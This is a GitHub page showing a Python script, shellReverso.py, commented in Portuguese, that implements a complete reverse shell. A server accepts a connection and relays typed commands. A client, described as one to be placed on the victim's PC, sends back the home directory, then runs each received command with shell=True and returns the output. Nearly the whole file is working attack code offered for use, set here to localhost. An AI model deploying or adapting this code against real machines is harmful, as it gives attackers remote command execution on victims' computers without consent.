-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathshellReverso.py
84 lines (72 loc) · 2.12 KB
/
shellReverso.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# quando o cliente conecta(via connect) o servidor recebe(via accept)
# com isso, recebe também os dados do cliente e pode enviar um retorno
import socket
import os
import sys
import subprocess
host = 'localhost'
port = 5555
# servidor:
def serv():
"""
servidor para envio de comandos ao cliente que será hospedado no alvo
:return:
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1) # socket em modo escuta
print(f"Escutando na porta {port} e no endereço {host}...")
conn, ende = s.accept()
print(f"Recebendo conexão de {ende}")
hostName = conn.recv(1024)
while True:
instrucao = str(input(str(ende[0] + "@" + str(hostName) + "> ")))
if "fim" in instrucao:
conn.send("Fim".encode())
conn.close()
break
else:
conn.send(instrucao.encode())
print(conn.recv(2048)) # dobro pela ida e volta(ping pong)
# cliente
def client():
"""
Cliente que será colocado no pc da vítima, ele, por sua vez, recebe e executa comandos
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print("Conexão estabelecida")
s.send(os.environ['HOME'].encode())
while True:
comando = s.recv(1024)
if 'fim' in str(comando):
s.close()
break
else:
terminal = subprocess.Popen(comando, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
s.send(terminal.stdout.read())
s.send(terminal.stderr.read())
#funções auxiliares
def main1():
"""
executa o servidor
:return:
"""
serv()
def main2():
"""
executa o cliente
:return:
"""
client()
if __name__ == '__main__':
try:
if sys.argv[1] == 'servidor':
main1()
elif sys.argv[1] == 'cliente':
main2()
else:
print("Opção inválida")
except IndexError:
print("Você deve executar o programa da seguinte forma:")
print("python3 shellReverso.py servidor/cliente")